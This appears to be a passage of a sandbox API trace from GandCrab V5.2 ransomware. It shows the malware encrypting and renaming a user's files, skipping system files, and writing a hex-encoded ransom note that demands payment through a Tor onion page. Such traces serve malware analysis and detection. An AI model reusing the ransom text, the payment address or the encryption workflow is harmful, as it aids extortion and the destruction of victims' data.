[0070.572] GetLastError () returned 0x0 [0070.572] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.572] CryptDestroyKey (hKey=0x503278) returned 1 [0070.572] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.573] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.573] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.573] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0070.573] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.573] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503478) returned 1 [0070.573] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.573] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0070.573] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.574] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0070.574] GetLastError () returned 0x0 [0070.574] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.574] CryptDestroyKey (hKey=0x503478) returned 1 [0070.574] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.574] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.574] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.574] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.575] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0x1f000, lpOverlapped=0x0) returned 1 [0070.595] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffe1000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.595] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1f000, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0x1f000, lpOverlapped=0x0) returned 1 [0070.598] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.598] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0070.601] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.605] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.605] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.605] CloseHandle (hObject=0x2c4) returned 1 [0070.608] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\system.mdw"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\system.mdw.titwmvjl"), dwFlags=0x1) returned 1 [0070.608] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.609] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.609] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.609] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.609] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\TITWMVJL-DECRYPT.txt" [0070.609] lstrlenW (lpString=".titwmvjl") returned 9 [0070.609] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\TITWMVJL-DECRYPT.txt") returned 75 [0070.609] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.609] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 84 [0070.609] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\TITWMVJL-DECRYPT.txt") returned 75 [0070.609] lstrlenW (lpString=".txt") returned 4 [0070.609] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.609] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.609] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.609] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.609] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\TITWMVJL-DECRYPT.txt") returned 75 [0070.609] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\TITWMVJL-DECRYPT.txt") returned 75 [0070.609] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.609] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.610] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.610] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.610] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.610] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.610] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.610] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.610] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.610] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0070.610] FindClose (in: hFindFile=0x5039b8 | out: hFindFile=0x5039b8) returned 1 [0070.610] CloseHandle (hObject=0x2bc) returned 1 [0070.611] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.611] lstrcmpW (lpString1="AddIns", lpString2=".") returned 1 [0070.611] lstrcmpW (lpString1="AddIns", lpString2="..") returned 1 [0070.611] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="AddIns" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns" [0070.611] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\" [0070.611] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.611] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.611] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.611] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.611] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.611] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.611] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.612] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.612] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.612] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.612] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.612] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\\\TITWMVJL-DECRYPT.txt") returned 76 [0070.612] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\addins\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0070.613] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x6